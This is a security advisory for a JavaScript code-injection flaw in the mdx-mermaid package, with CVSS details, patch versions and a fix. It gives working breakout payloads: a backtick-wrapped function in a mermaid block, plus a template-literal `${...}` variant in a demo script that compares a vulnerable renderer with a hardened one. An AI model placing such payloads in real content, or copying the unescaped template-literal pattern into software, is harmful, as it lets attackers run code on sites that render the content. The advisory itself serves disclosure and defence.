OSV:GHSA-RVGM-35JW-Q628

History: Aug 31, 2022 - 10:26 p.m.
Improper Control of Generation of Code ('Code Injection') in mdx-mermaid

2022-08-31 22:26:11
Source: Google osv.dev

CVSS3: 7.8 (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)

Attack Vector: LOCAL
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH

EPSS: 0.001 (percentile 17.8%)

Impact

Arbitrary JavaScript injection

Any mermaid code block can be modified with the following code, and the JavaScript placed inside the function body executes when the component is loaded by MDX.js. The payload works because the block's text is emitted unescaped inside a backtick-delimited JavaScript template literal: the leading backtick closes that literal early, the `+` concatenates the return value of an immediately-invoked function, and the trailing backtick reopens the literal so the rest of the chart still parses.

```javascript
` + (function () {
  // Put Javascript code here
  return ''
}()) + `
```

The block below shows a valid mermaid code block

```mermaid
graph TD;
    A-->B;
    A-->C;
    B-->D;
    C-->D;
```

The same block but with the exploit added

```mermaid
` + (function () {
  alert('vulnerable')
  return ''
}()) + `
graph TD;
    A-->B;
    A-->C;
    B-->D;
    C-->D;
```
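The mechanism behind the payload, as an added example that is not mdx-mermaid's own code: a toy transform that drops a mermaid block's text straight into a JavaScript template literal (the vulnerable shape) next to one that emits a JSON string literal instead, plus a stand-in for MDX evaluating the resulting attribute expression. The function names, the `globalThis.pwned` flag and both chart strings are constructed for this example; it also goes beyond the advisory's payload to the `${...}` interpolation vector, which a template literal exposes as well and which the same fix covers.

```javascript
// Added example (not mdx-mermaid's code): a minimal model of a plugin that
// rewrites the text of a mermaid fence into a JSX attribute holding a
// JavaScript template literal, the vulnerable version beside a hardened one.

// The valid chart from the advisory.
const VALID_CHART = 'graph TD;\n    A-->B;\n    A-->C;\n    B-->D;\n    C-->D;';

// Constructed input: the advisory's payload prepended to the chart. The
// function body sets a global flag instead of calling alert() so the effect
// can be observed outside a browser.
const INJECTED_CHART =
  "` + (function () {\n  globalThis.pwned = true\n  return ''\n}()) + `\n" +
  VALID_CHART;

// Constructed input for the second vector a template literal exposes:
// ${...} interpolation evaluates code even without a backtick.
const INTERPOLATED_CHART = VALID_CHART + '\n${(globalThis.pwned = true, "")}';

// Vulnerable: the chart text is pasted verbatim between backticks. A backtick
// in the text closes the literal early; "${" starts an interpolation.
function renderChartVulnerable(chart) {
  return '`' + chart + '`';
}

// Hardened: emit a JSON string literal instead. JSON.stringify escapes
// backslashes, double quotes and newlines, and inside a JSON string literal
// backticks and "${" are plain characters with no meaning to JavaScript.
function renderChartSafe(chart) {
  return JSON.stringify(chart);
}

// Stand-in for MDX compiling the attribute expression to JavaScript and the
// component being loaded: evaluate the expression text as JS.
function evaluateAttribute(expr) {
  return new Function('return (' + expr + ');')();
}

// Run one chart through a renderer and report whether injected code ran and
// what value the attribute ended up holding.
function probe(render, chart) {
  delete globalThis.pwned;
  const value = evaluateAttribute(render(chart));
  const executed = globalThis.pwned === true;
  delete globalThis.pwned;
  return { executed, value };
}

function demo() {
  return {
    vulnBacktick: probe(renderChartVulnerable, INJECTED_CHART),
    vulnInterpolation: probe(renderChartVulnerable, INTERPOLATED_CHART),
    safeBacktick: probe(renderChartSafe, INJECTED_CHART),
    safeInterpolation: probe(renderChartSafe, INTERPOLATED_CHART),
  };
}

const results = demo();
console.log('vulnerable renderer, backtick payload ran:', results.vulnBacktick.executed);
console.log('vulnerable renderer, ${} payload ran:', results.vulnInterpolation.executed);
console.log('hardened renderer, backtick payload ran:', results.safeBacktick.executed);
console.log('hardened renderer, ${} payload ran:', results.safeInterpolation.executed);
```

Against the vulnerable renderer both payloads run and the attribute silently loses the injected prefix, which is why a rendered page can look normal after compromise; against the hardened renderer neither runs and the attribute holds the chart text byte for byte, so mermaid sees exactly what the author wrote. Escaping only the backtick would leave the `${...}` vector open, which is why the fix serializes the whole string rather than patching individual characters.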

Patches

Fixed in 1.3.0 (1.x line) and 2.0.0-rc2 (2.x prerelease line). Confirm the installed version with `npm ls mdx-mermaid` and upgrade to one of those releases or later.

Workarounds

None known
